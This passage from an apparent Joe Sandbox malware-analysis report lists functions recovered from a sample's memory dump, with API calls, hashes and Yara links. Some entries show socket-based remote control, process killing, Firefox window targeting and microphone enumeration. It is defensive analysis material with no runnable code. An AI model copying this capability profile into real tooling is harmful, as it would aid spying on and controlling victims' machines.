                                • Instruction ID: dd97895563485985900743d8825695b5a5feaf8de49296c4139e4f035790e747
                                • Opcode Fuzzy Hash: 3314358a5031b85a8a43de4ad9b278f8bac00cd9504b336f40623512fedec271
                                • Instruction Fuzzy Hash: 25110835A043106FD318FBA48CD4BAFB79AEF84614F09881AF9459B2D0DF74D5158BA3
                                Function 03343504 Relevance: 7.9, APIs: 5, Instructions: 376timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$InformationTimeZone
                                • String ID:
                                • API String ID: 597776487-0
                                • Opcode ID: d3e47db79789ba88395f6ec06906b0d8422ca2ce899f4067ac8a45ceb719770e
                                • Instruction ID: 68ac9c2ac4bb0fc85572c815e48b0867c47702ccb3051cd3ce291cc2ac30540c
                                • Opcode Fuzzy Hash: d3e47db79789ba88395f6ec06906b0d8422ca2ce899f4067ac8a45ceb719770e
                                • Instruction Fuzzy Hash: 4DC1387DD00315ABDB25DF68CCC0ABABBEDEF06230F18459AE484DB250EB35A955CB50
                                Function 033140D4 Relevance: 7.7, APIs: 5, Instructions: 229sleepCOMMON
                                Download Yara Rule
                                APIs
                                • RtlEnterCriticalSection.NTDLL(?), ref: 03314108
                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0331411D
                                • wsprintfA.USER32 ref: 033141DA
                                • Sleep.KERNEL32(0000001E), ref: 033142E4
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 033143AB
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$EnterFreeLeaveSleepVirtualwsprintf
                                • String ID:
                                • API String ID: 2944957049-0
                                • Opcode ID: 5ab171d40e3078cd912e483e7ced7c2d67ce7f2c37606571bbd2be52916db4e9
                                • Instruction ID: 575bb5d588180f7b1c77a4031d0fc95762fb4f61e3890353e9aac71dac40696e
                                • Opcode Fuzzy Hash: 5ab171d40e3078cd912e483e7ced7c2d67ce7f2c37606571bbd2be52916db4e9
                                • Instruction Fuzzy Hash: 00918E71A006199BDB18DF6ACCC8B99B7B6FF48314F1842A9E40DD7690DB70E9A5CF40
                                Function 03315514 Relevance: 7.6, APIs: 5, Instructions: 143stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,10081068), ref: 03315552
                                • lstrcpy.KERNEL32(00000000,?), ref: 03315571
                                • GetFileAttributesA.KERNEL32(00000000), ref: 03315602
                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 03315610
                                • GetLastError.KERNEL32 ref: 0331561A
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: AttributesCreateDirectoryErrorFileLastlstrcpylstrlen
                                • String ID:
                                • API String ID: 20055568-0
                                • Opcode ID: d4f4fa85e036d253de6ca749bac9626778ac3e53a53f8a3ccaadbb262ca55003
                                • Instruction ID: c3219667786381c1f982011de39fe31f8bf5391ffbd55161a824fcfc6836cbce
                                • Opcode Fuzzy Hash: d4f4fa85e036d253de6ca749bac9626778ac3e53a53f8a3ccaadbb262ca55003
                                • Instruction Fuzzy Hash: 7C410B71C042559FEB25CF588CC07AEFBBAEF8B610F18415AD8A297240D7755522CFD4
                                Function 0331312F Relevance: 7.6, APIs: 5, Instructions: 131sleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001), ref: 03313156
                                  • Part of subcall function 0331C074: GetComputerNameA.KERNEL32(?,00000200), ref: 0331C0C6
                                  • Part of subcall function 0331C074: lstrcpy.KERNEL32(?,100796B0), ref: 0331C0DC
                                  • Part of subcall function 0331C074: wsprintfA.USER32 ref: 0331C108
                                  • Part of subcall function 0331C074: _strstr.LIBCMT ref: 0331C159
                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 033131B9
                                  • Part of subcall function 0331AFB4: CreateFileA.KERNEL32(1008C3A0,80000000,00000001,00000000,00000003,00000080,00000000,?,10064158), ref: 0331AFE3
                                  • Part of subcall function 0331AFB4: GetFileSize.KERNEL32(00000000,00000000), ref: 0331AFF2
                                  • Part of subcall function 0331AFB4: CloseHandle.KERNEL32(00000000), ref: 0331B007
                                • Sleep.KERNEL32(00000096), ref: 033131FA
                                • CreateFileA.KERNEL32(1008C3A0,80000000,00000001,00000000,00000003,00000080,00000000), ref: 03313217
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 03313231
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Create$Size$CloseComputerEventFolderHandleNamePathSleepSpecial_strstrlstrcpywsprintf
                                • String ID:
                                • API String ID: 1777496915-0
                                • Opcode ID: d07c5915c92d9636b0b957ddcb4ce9ce1f4747c33fc18c542a7aff26917468f7
                                • Instruction ID: 0bb0ffb5936099a02026c4d2ec214d6d764f9391b806cd950e99784aca40b56b
                                • Opcode Fuzzy Hash: d07c5915c92d9636b0b957ddcb4ce9ce1f4747c33fc18c542a7aff26917468f7
                                • Instruction Fuzzy Hash: 66419370D84228AAEF20EB60CC85FC9BB75EF44B10F110196F659BB2D1DBB56A80CF54
                                Function 0333E022 Relevance: 7.6, APIs: 5, Instructions: 120COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 0333E090
                                • _free.LIBCMT ref: 0333E0B0
                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0333E111
                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0333E123
                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0333E130
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: __crt_fast_encode_pointer$_free
                                • String ID:
                                • API String ID: 366466260-0
                                • Opcode ID: 8d19afbe58269770ee40e63d60f58211311f214fa199bb43eddd3d68f67ccd5d
                                • Instruction ID: d60bb66a8636858547e13b0df6b815c642cbe88982abf880bb963f526d46139c
                                • Opcode Fuzzy Hash: 8d19afbe58269770ee40e63d60f58211311f214fa199bb43eddd3d68f67ccd5d
                                • Instruction Fuzzy Hash: 5E418277E00314AFCB20DF79C8C0A99B7B6EF8A714B1985A9D915EF350DA35AD01CB80
                                Function 0331D30F Relevance: 7.6, APIs: 5, Instructions: 117sleepthreadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 033250E4: Sleep.KERNEL32(000003E8), ref: 0332514C
                                  • Part of subcall function 03324F64: wvsprintfA.USER32(?,?,?), ref: 03324F85
                                • inet_addr.WS2_32(?), ref: 0331D3A1
                                  • Part of subcall function 03325214: socket.WS2_32(00000002,00000001,00000000), ref: 0332522E
                                  • Part of subcall function 03325214: htons.WS2_32(?), ref: 0332524D
                                  • Part of subcall function 03325214: connect.WS2_32(00000000,?,00000010), ref: 0332525E
                                  • Part of subcall function 03325214: closesocket.WS2_32(00000000), ref: 0332526E
                                • recv.WS2_32(00000000,?,00000002,00000000), ref: 0331D3DE
                                • CreateThread.KERNEL32(00000000,00000000,10032F90,?,00000000,?), ref: 0331D42A
                                • Sleep.KERNEL32(000003E8), ref: 0331D453
                                • closesocket.WS2_32(00000000), ref: 0331D479
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleepclosesocket$CreateThreadconnecthtonsinet_addrrecvsocketwvsprintf
                                • String ID:
                                • API String ID: 421157994-0
                                • Opcode ID: 16d223d99b6a0c717c77d6e2f279049fec7042d94bd3a7df6ed9b6348271b440
                                • Instruction ID: 1a478cbebc4fd66b9733bf427151da6f19aaa6a2caa6d958b82fb4f9c25ac477
                                • Opcode Fuzzy Hash: 16d223d99b6a0c717c77d6e2f279049fec7042d94bd3a7df6ed9b6348271b440
                                • Instruction Fuzzy Hash: 8041C375904750AFE320DF60CCC4BEBB7E9EF85700F00481EF69596241DBB4A994C7A6
                                Function 0331A244 Relevance: 7.6, APIs: 5, Instructions: 116processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0331A25F
                                • Process32First.KERNEL32(00000000,00000128), ref: 0331A279
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0331A38B
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0331A396
                                • CloseHandle.KERNEL32(00000000), ref: 0331A39D
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 2931323676-0
                                • Opcode ID: cda1237640b6c1c0b1d0494eeb203e43edb38d7fd14705a2d3002403a87e36a5
                                • Instruction ID: fca16e96c568c167dcdfca8d19c8f1fca44175eddce7432f928b51ed1acaf7bd
                                • Opcode Fuzzy Hash: cda1237640b6c1c0b1d0494eeb203e43edb38d7fd14705a2d3002403a87e36a5
                                • Instruction Fuzzy Hash: E9410631A0121C9BDB25DB648CC5BFA7BADAF05304F0804E5ED08DB141EB72AA99CB90
                                Function 0331D314 Relevance: 7.6, APIs: 5, Instructions: 112sleepthreadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 033250E4: Sleep.KERNEL32(000003E8), ref: 0332514C
                                  • Part of subcall function 03324F64: wvsprintfA.USER32(?,?,?), ref: 03324F85
                                • inet_addr.WS2_32(?), ref: 0331D3A1
                                  • Part of subcall function 03325214: socket.WS2_32(00000002,00000001,00000000), ref: 0332522E
                                  • Part of subcall function 03325214: htons.WS2_32(?), ref: 0332524D
                                  • Part of subcall function 03325214: connect.WS2_32(00000000,?,00000010), ref: 0332525E
                                  • Part of subcall function 03325214: closesocket.WS2_32(00000000), ref: 0332526E
                                • recv.WS2_32(00000000,?,00000002,00000000), ref: 0331D3DE
                                • CreateThread.KERNEL32(00000000,00000000,10032F90,?,00000000,?), ref: 0331D42A
                                • Sleep.KERNEL32(000003E8), ref: 0331D453
                                • closesocket.WS2_32(00000000), ref: 0331D479
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleepclosesocket$CreateThreadconnecthtonsinet_addrrecvsocketwvsprintf
                                • String ID:
                                • API String ID: 421157994-0
                                • Opcode ID: c1e8ccd600a1afbd2d218bd751e38248d4638ce6f44731d33dbfe5eca1ed4042
                                • Instruction ID: c9b33429a116519a83146b43b61500de4c86e96452fd677f9f4c6ac441d55b89
                                • Opcode Fuzzy Hash: c1e8ccd600a1afbd2d218bd751e38248d4638ce6f44731d33dbfe5eca1ed4042
                                • Instruction Fuzzy Hash: 1D41B175904750AFE320DF60CCC4BABB7E9EF85700F00481EF69596291DBB4A994CBA6
                                Function 03329084 Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 033290B8
                                • std::_Lockit::_Lockit.LIBCPMT ref: 033290D8
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 033290F8
                                • std::_Facet_Register.LIBCPMT ref: 033291BC
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 033291D4
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                • String ID:
                                • API String ID: 459529453-0
                                • Opcode ID: fb16aeb2875a944e3336d5cad351bf72bae7e1541c6434f1b8e8d819a81eadbc
                                • Instruction ID: b7b8fb5c3b1d8ff60dfb69f8a3f5f4a63a46bf08c2ae9c2c8127f0b4460c35d7
                                • Opcode Fuzzy Hash: fb16aeb2875a944e3336d5cad351bf72bae7e1541c6434f1b8e8d819a81eadbc
                                • Instruction Fuzzy Hash: E941AA75E04264DFDB21CF55CDC4BAABBB8FF04714F14819AE805AB380DB71AA11CB92
                                Function 03322614 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 03322641
                                • std::_Lockit::_Lockit.LIBCPMT ref: 03322661
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 03322681
                                • std::_Facet_Register.LIBCPMT ref: 0332271F
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 03322737
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                • String ID:
                                • API String ID: 459529453-0
                                • Opcode ID: 5db8f90c598cdc9769e58086308f86aa8b3de8cd9e53e462ad51321bb129b7cc
                                • Instruction ID: b5e789931caccfc3c47cba9e3537ca3249d9535235a48bb45ea6842eb6c66e05
                                • Opcode Fuzzy Hash: 5db8f90c598cdc9769e58086308f86aa8b3de8cd9e53e462ad51321bb129b7cc
                                • Instruction Fuzzy Hash: 1D41C072E046748FDB15DF58CCC4BAABBB8FF40310F1485AEE805AB291DB71A945CB81
                                Function 0332035F Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0331F4C4: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0331F501
                                  • Part of subcall function 0331F4C4: GetLastError.KERNEL32 ref: 0331F507
                                  • Part of subcall function 0331F4C4: wsprintfA.USER32 ref: 0331F584
                                  • Part of subcall function 0331F4C4: GetFileAttributesA.KERNEL32(?), ref: 0331F61B
                                • ScreenToClient.USER32(00000000,?), ref: 033204F5
                                • ChildWindowFromPoint.USER32(00000000,?,?), ref: 03320504
                                • ScreenToClient.USER32(00000000,?), ref: 03320520
                                • ChildWindowFromPoint.USER32(00000000,?,?), ref: 0332052F
                                • PostMessageA.USER32(00000000,?,?,?), ref: 033207AA
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: ChildClientFromPointScreenWindow$AttributesErrorFileFolderLastMessagePathPostwsprintf
                                • String ID:
                                • API String ID: 2215989397-0
                                • Opcode ID: 5982b84d0cc05445ac17af546a40de33cb46d8639bc782d04c95f42259e0e7a0
                                • Instruction ID: fde20121e2d76138aa5ab95171e02adfe5411b737b1a2ba04bb7dca37269b480
                                • Opcode Fuzzy Hash: 5982b84d0cc05445ac17af546a40de33cb46d8639bc782d04c95f42259e0e7a0
                                • Instruction Fuzzy Hash: 6B016D720086219FD716DF54C884A7FFBEAEBC8351F15490DF59682120DF34C45ADBA2
                                Function 0332036F Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0331F744: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0331F77F
                                  • Part of subcall function 0331F744: lstrcpy.KERNEL32(?,?), ref: 0331F7BD
                                  • Part of subcall function 0331F744: CreateFileA.KERNEL32(?,00000001,00000003,00000000,00000003,00000080,00000000), ref: 0331F7E7
                                  • Part of subcall function 0331F744: GetFileSize.KERNEL32(00000000,00000000), ref: 0331F7FB
                                  • Part of subcall function 0331F744: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0331F81D
                                  • Part of subcall function 0331F744: _strstr.LIBCMT ref: 0331F82D
                                  • Part of subcall function 0331F744: _strstr.LIBCMT ref: 0331F84C
                                  • Part of subcall function 0331F744: _strstr.LIBCMT ref: 0331F864
                                • ScreenToClient.USER32(00000000,?), ref: 033204F5
                                • ChildWindowFromPoint.USER32(00000000,?,?), ref: 03320504
                                • ScreenToClient.USER32(00000000,?), ref: 03320520
                                • ChildWindowFromPoint.USER32(00000000,?,?), ref: 0332052F
                                • PostMessageA.USER32(00000000,?,?,?), ref: 033207AA
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: File_strstr$ChildClientFromPointScreenWindow$CreateFolderMessagePathPostReadSizelstrcpy
                                • String ID:
                                • API String ID: 2443932908-0
                                • Opcode ID: fbf87b26a5ee2f5fa0121e3c0048cdaf22aae0457f2df534e1cfa85f3037c78f
                                • Instruction ID: 08ce5fa47f1dbe9d446c18c0040c730c49996da83c2ea3ae5db8df494593dd4b
                                • Opcode Fuzzy Hash: fbf87b26a5ee2f5fa0121e3c0048cdaf22aae0457f2df534e1cfa85f3037c78f
                                • Instruction Fuzzy Hash: FA016D760086219FD716DF54C884A7FFBEAEBC8251F05450DF99682120DF34C45ADB62
                                Function 033143E8 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                Download Yara Rule
                                APIs
                                • RtlEnterCriticalSection.NTDLL(?), ref: 03314402
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 03314413
                                • RtlEnterCriticalSection.NTDLL(?), ref: 03314437
                                • closesocket.WS2_32(000000FF), ref: 0331444A
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 0331445C
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$EnterLeave$closesocket
                                • String ID:
                                • API String ID: 3380830492-0
                                • Opcode ID: 35ced25d468d5670fca1f9a04b1e1b485d0dd7ddd7f6f3567e06f47098f018b7
                                • Instruction ID: d6eb39978a39fa672c3f6aa42b54a569d75c174fa808e4f5231d35fff7971933
                                • Opcode Fuzzy Hash: 35ced25d468d5670fca1f9a04b1e1b485d0dd7ddd7f6f3567e06f47098f018b7
                                • Instruction Fuzzy Hash: 7D01DE34000A14ABC710DF6CCC889CDBBBAAF06331F424345FA25A72D0DF70A6A68BD0
                                Function 033143F4 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                • RtlEnterCriticalSection.NTDLL(?), ref: 03314402
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 03314413
                                • RtlEnterCriticalSection.NTDLL(?), ref: 03314437
                                • closesocket.WS2_32(000000FF), ref: 0331444A
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 0331445C
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$EnterLeave$closesocket
                                • String ID:
                                • API String ID: 3380830492-0
                                • Opcode ID: ea77a2f87bbcd6cc39a3a749d8b4df51597107300b4aada49ffeb47442c28fdf
                                • Instruction ID: c0a1ec80b41c211e2ecfe3cba989398b173de452aee952545d5545c2365697df
                                • Opcode Fuzzy Hash: ea77a2f87bbcd6cc39a3a749d8b4df51597107300b4aada49ffeb47442c28fdf
                                • Instruction Fuzzy Hash: EC01BC30500A24ABC711DF6CCC889D9BBBAAF06321F424355FA25972D0DF70A6A68BD0
                                Function 0334C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 0334C817
                                  • Part of subcall function 0333F9D6: HeapFree.KERNEL32(00000000,00000000,?,0334CAA3,03345C0B,00000000,03345C0B,?,?,0334CD48,03345C0B,00000007,03345C0B,?,0334AD5A,03345C0B), ref: 0333F9EC
                                  • Part of subcall function 0333F9D6: GetLastError.KERNEL32(03345C0B,?,0334CAA3,03345C0B,00000000,03345C0B,?,?,0334CD48,03345C0B,00000007,03345C0B,?,0334AD5A,03345C0B,03345C0B), ref: 0333F9FE
                                • _free.LIBCMT ref: 0334C829
                                • _free.LIBCMT ref: 0334C83B
                                • _free.LIBCMT ref: 0334C84D
                                • _free.LIBCMT ref: 0334C85F
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 5cde48d4c67deb276c8c0114ed93fbd9285caafbdb6db17bde0aeeed6ae2ce87
                                • Instruction ID: 1320e5ea8b34c41915825e1ad598a2edf440384e51d5756df053acddbc14f149
                                • Opcode Fuzzy Hash: 5cde48d4c67deb276c8c0114ed93fbd9285caafbdb6db17bde0aeeed6ae2ce87
                                • Instruction Fuzzy Hash: 93F01232D05214B7DA21EB58E8C9C56B3DDBF01A617A89817F109DBA14CB70F8808B94
                                Function 03317404 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • waveInGetNumDevs.WINMM(10081068), ref: 03317449
                                • waveInGetDevCapsA.WINMM(00000000,?,00000030), ref: 033174BB
                                • WaitForSingleObject.KERNEL32(?,000000FF,10081068), ref: 033175CE
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$CapsDevsObjectSingleWait
                                • String ID: N/A@
                                • API String ID: 3710653462-4129345051
                                • Opcode ID: 6a24dfd8480fb9b98ef9947563c833ff139a6c5a01754191a5aa5a992f310939
                                • Instruction ID: ef7869d6303f55bcfb0309427c1a2f243f424aac6cb326c26fcb9b2ed6892cd4
                                • Opcode Fuzzy Hash: 6a24dfd8480fb9b98ef9947563c833ff139a6c5a01754191a5aa5a992f310939
                                • Instruction Fuzzy Hash: 9E5126B4D043659FDF24DF64CC8079EBFA9EF44310F0842E9DA196B282DB309A55CB61
                                Function 03321254 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON
                                Download Yara Rule
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104,1006421C), ref: 03321289
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 033212CA
                                • wsprintfA.USER32 ref: 03321349
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: DirectoryInformationVolumeWindowswsprintf
                                • String ID: :\
                                • API String ID: 3001812590-112054617
                                • Opcode ID: df8681f24289aea0b49586638765918338bb4aa3b2fc7347c159a5c4d24caf0d
                                • Instruction ID: ba127d1f2eb63f08a2422529e99537c0a2db36c91303e128a75386b8dab81b7d
                                • Opcode Fuzzy Hash: df8681f24289aea0b49586638765918338bb4aa3b2fc7347c159a5c4d24caf0d
                                • Instruction Fuzzy Hash: 0F21E77090036C6EDB15CA758C92BEDBFFCDB15300F0081EAE544EA291D5749B858FA5
                                Function 0331902B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0331A244: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0331A25F
                                  • Part of subcall function 0331A244: Process32First.KERNEL32(00000000,00000128), ref: 0331A279
                                  • Part of subcall function 0333E6C3: _free.LIBCMT ref: 0333E69F
                                  • Part of subcall function 03319384: LocalSize.KERNEL32(00000000), ref: 03319395
                                  • Part of subcall function 03319384: LocalFree.KERNEL32(00000000,00000000,00000000,?,?,?,033191BA), ref: 033193A5
                                • EnumWindows.USER32(10027C20,?), ref: 033192E5
                                • LocalSize.KERNEL32(00000000), ref: 033192FF
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 0331930F
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$FreeSize$CreateEnumFirstProcess32SnapshotToolhelp32Windows_free
                                • String ID: firefox.exe
                                • API String ID: 2566939795-3034799888
                                • Opcode ID: bbd8f7e9973d5fead9b12229f66eec43574ce1fbf8fe34eef68770f943bd53de
                                • Instruction ID: af480850a8fbde1cc9bba1feddc79078a13b8b8c07a20d0ea7ba71bcb9850718
                                • Opcode Fuzzy Hash: bbd8f7e9973d5fead9b12229f66eec43574ce1fbf8fe34eef68770f943bd53de
                                • Instruction Fuzzy Hash: 93014E35A043506FD318EB648CD4BBEB756DF81210F09881AF8468B2C0CF34D91187A3
                                Function 0334040E Relevance: 6.3, APIs: 4, Instructions: 321COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: _strrchr
                                • String ID:
                                • API String ID: 3213747228-0
                                • Opcode ID: 068bd8c4e769d16ba2f9e4860225bef101eb4a08a9a679f6a2874fca9b9bbf3d
                                • Instruction ID: 09b627fa1b2fe7bbba753c9492198f241e2cfc6058f32ad62ae226fd16f86df4
                                • Opcode Fuzzy Hash: 068bd8c4e769d16ba2f9e4860225bef101eb4a08a9a679f6a2874fca9b9bbf3d
                                • Instruction Fuzzy Hash: 2AB10776E052559FDB19CF28C8C07AEFBE5EF85340F1841AAEA459F341D638A941CB60
                                Function 033513B0 Relevance: 6.1, APIs: 4, Instructions: 133fileCOMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 03351480
                                • _free.LIBCMT ref: 033514A9
                                • SetEndOfFile.KERNEL32(00000000,0334F673,00000000,03344D6A,?,?,?,?,?,?,?,0334F673,03344D6A,00000000), ref: 033514DB
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,0334F673,03344D6A,00000000,?,?,?,?,00000000), ref: 033514F7
                                Memory Dump Source
                                • Source File: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 032F2000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_32f2000_33MwVPy.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFileLast
                                • String ID:
                                • API String ID: 1547350101-0
                                • Opcode ID: b3d7b257df67468a99ab8e62c8491426388caf9ea3b71af238aa1f4c9f1779dc
                                • Instruction ID: 7bb03f9df417a420325ce076c5acab6d8392474d507d597a307e36ed12895061
                                • Opcode Fuzzy Hash: b3d7b257df67468a99ab8e62c8491426388caf9ea3b71af238aa1f4c9f1779dc
                                • Instruction Fuzzy Hash: 9F41A4BAD00341AADF11EFA88CC1F9EB7BAEF45222F185110FC14AF290EA7494808761
                                Function 03342588 Relevance: 6.1, APIs: 4, Instructions: 78COMMONLIBRARYCODE
                                Download Yara Rule
